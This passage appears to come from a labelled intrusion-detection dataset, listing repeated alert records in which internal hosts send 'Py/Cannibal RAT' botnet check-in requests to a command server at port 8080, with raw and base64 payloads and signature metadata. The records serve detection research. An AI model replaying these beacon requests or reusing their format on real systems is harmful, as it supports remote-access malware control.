'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobf9AAIAGTyHAqAoPza6lScvnH5DQipVvEAcfLFARAQDwfgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:12:32.079060+0000', 'flow_id': 769535879686552, 'pcap_cnt': 4120377, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52199, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:12:32.010648+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobf9AAIAGTyHAqAoPza6lScvnH5DQipVvEAcfLFARAQDwfgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,238,981
192.168.10.9-2107-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4129050, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:13:16
80,026
Friday
[{'timestamp': '2017-07-07T13:13:16.187369+0000', 'flow_id': 1612341610063246, 'pcap_cnt': 4129050, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2107, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:13:16.107918+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoCU1AAIAGs9nAqAoJza6lSQg7H5AFkoaE+c0JNlARAQC6RAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:13:16.187369+0000', 'flow_id': 1612341610063246, 'pcap_cnt': 4129050, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2107, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:13:16.107918+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoCU1AAIAGs9nAqAoJza6lSQg7H5AFkoaE+c0JNlARAQC6RAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,239,225
192.168.10.15-52206-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4147562, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:13:47
77,203
Friday
[{'timestamp': '2017-07-07T13:13:47.853550+0000', 'flow_id': 1328697676913564, 'pcap_cnt': 4147562, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52206, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:13:47.777116+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobgRAAIAGTxzAqAoPza6lScvuH5B1OaiM1Z1s+VARAQAlSAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:13:47.853550+0000', 'flow_id': 1328697676913564, 'pcap_cnt': 4147562, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52206, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:13:47.777116+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobgRAAIAGTxzAqAoPza6lScvuH5B1OaiM1Z1s+VARAQAlSAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,239,492
192.168.10.15-52220-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4150493, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:14:12
71,315
Friday
[{'timestamp': '2017-07-07T13:14:12.144918+0000', 'flow_id': 819920147587732, 'pcap_cnt': 4150493, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52220, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:14:12.074388+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobglAAIAGTxfAqAoPza6lScv8H5DH9mEJ3lkWwlARAQBnewAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:14:12.144918+0000', 'flow_id': 819920147587732, 'pcap_cnt': 4150493, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52220, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:14:12.074388+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobglAAIAGTxfAqAoPza6lScv8H5DH9mEJ3lkWwlARAQBnewAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,239,630
192.168.10.9-2108-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4180529, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:14:56
74,234
Friday
[{'timestamp': '2017-07-07T13:14:56.286327+0000', 'flow_id': 139081934716806, 'pcap_cnt': 4180529, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2108, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:14:56.212870+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoCZlAAIAGs43AqAoJza6lSQg8H5CwVeDpY5Dbu1ARAQB40gAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:14:56.286327+0000', 'flow_id': 139081934716806, 'pcap_cnt': 4180529, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2108, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:14:56.212870+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoCZlAAIAGs43AqAoJza6lSQg8H5CwVeDpY5Dbu1ARAQB40gAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,239,903
192.168.10.15-52221-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4184618, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:15:27
80,174
Friday
[{'timestamp': '2017-07-07T13:15:27.936000+0000', 'flow_id': 1837080077341197, 'pcap_cnt': 4184618, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52221, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:15:27.856589+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobg5AAIAGTxLAqAoPza6lScv9H5BuU6Ie7T9fW1ARAQAoiQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:15:27.936000+0000', 'flow_id': 1837080077341197, 'pcap_cnt': 4184618, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52221, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 